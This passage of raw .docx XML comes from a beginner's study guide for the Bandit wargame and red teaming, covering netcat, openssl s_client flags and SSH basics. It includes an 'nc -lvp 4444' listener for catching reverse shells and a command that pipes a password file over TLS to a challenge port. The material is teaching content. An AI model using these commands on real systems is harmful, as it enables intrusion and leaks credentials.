          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The most important nc skill to build right now is the reverse shell listener. When you start doing TryHackMe machines, you will use nc -lvp 4444 constantly to catch shells from exploited targets. The moment that connection comes in is one of the most satisfying moments in ethical hacking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">2. OpenSSL — s_client subcommand</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenSSL is a massive toolkit that handles everything SSL and TLS related — certificates, encryption, connections, key generation. For Bandit and early red teaming, you only need one part of it: s_client.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">s_client makes OpenSSL act as an SSL/TLS client — it connects to a server that requires encryption, handles all the certificate negotiation automatically, and then lets you send and receive data just like nc would.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of it as nc with a built-in encryption layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1  Basic Syntax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl s_client -connect [host]:[port] [options]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E75B6" w:sz="12"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike nc where host and port are separate arguments, openssl s_client combines them with a colon:  -connect localhost:30001  not  localhost 30001. This is a common mistake.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2  All Important Flags — Explained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Flag / Option</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What it does</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Red Team relevance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-connect host:port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target to connect to. Host and port separated by a colon.</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Always required. This is the SSL-enabled service you are talking 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-quiet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Suppress all the certificate and handshake output. Only show the actual data exchange.</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Use this when piping input — without it the certificate noise can confuse automated scripts.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-CAfile [file]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Specify a certificate authority file to verify the server certificate against.</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Used when testing if a server's certificate is properly trusted. Rarely needed for Bandit.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-cert [file]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Use a client certificate for mutual TLS authentication.</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Some high-security services require the client to also present a certificate. Common in corporate environments.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-key [file]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Specify the private key matching your client certificate.</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Used alongside -cert when the server needs to verify you as a client.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-verify [depth]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Verify the server certificate chain up to this many levels deep.</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Useful for testing certificate chains in web application pen testing.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-starttls [protocol]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Upgrade a plain connection to TLS mid-session (used by email servers).</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Email pen testing — SMTP, IMAP, POP3 all use STARTTLS. Syntax: -starttls smtp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-servername [name]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Send a specific hostname in the TLS handshake (SNI — Server Name Indication).</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When one IP hosts multiple HTTPS sites, SNI tells the server which certificate to use. Essential for web app testing.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-tls1_2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Force TLS version 1.2 only.</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Testing if a server accepts old TLS versions — a misconfiguration vulnerability.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-tls1_3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Force TLS version 1.3 only.</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Testing modern TLS support. TLS 1.3 is the current standard.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-no_tls1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Disable TLS 1.0.</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Part of testing which TLS versions a server supports — old versions are vulnerabilities.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-showcerts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Print all certificates in the chain, not just the server certificate.</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Useful for examining a full certificate chain during web application testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3  What you see when you connect — explained</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When you run openssl s_client -connect localhost:30001, before you can type anything, OpenSSL prints a wall of text. Here is what each part means:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CONNECTED(00000003)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The TCP connection succeeded. The number is a file descriptor — ignore it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Certificate chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 s:CN = localhost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   i:CN = localhost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The server sent a certificate. s: is the subject (who the cert belongs to). i: is the issuer (who signed it). For Bandit they are the same because it is a self-signed certificate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL handshake has read 1234 bytes...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How many bytes were exchanged during the TLS negotiation. Ignore this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">read R BLOCK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is where OpenSSL is waiting for you to type input. Everything above the --- is the handshake noise. This line means the encrypted channel is open and ready.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E75B6" w:sz="12"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The -quiet flag removes everything above that --- line. That is why it is useful when piping data — the noise disappears and you just get the response from the server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4  Real Examples</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Example 1 — Bandit Level 15 (send password over SSL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/bandit_pass/bandit15 | openssl s_client -connect localhost:30001 -quiet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">cat reads the password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">| pipes it into openssl.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-connect localhost:30001 connects to the SSL-enabled challenge port.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-quiet suppresses the certificate noise so you only see the response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Example 2 — Interactive SSL connection (type manually)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl s_client -connect localhost:30001</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect without -quiet so you can see everything happening.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Wait for the --- and 'read R BLOCK' message.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Type the password and press Enter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Good for learning — you can see the full handshake.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Example 3 — Test a real website's SSL certificate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl s_client -connect google.com:443</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how you inspect any website's TLS certificate from the command line.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You will use this in web application pen testing to check for weak certs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="C0392B" w:sz="12"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team Use: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In real web app testing, openssl s_client is your first tool when you need to inspect what TLS version a server supports, whether its certificate is valid, or what cipher suites it accepts. Weak TLS versions (1.0, 1.1) and self-signed certificates are reportable vulnerabilities in a penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">3. SSH — Secure Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH (Secure Shell) lets you log into a remote machine and run commands on it as if you were physically sitting in front of it. The entire connection is encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It is the single most important tool for both legitimate system administration and red teaming. Almost every Linux server in the world accepts SSH connections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1  Basic Syntax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh [options] [user]@[host]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
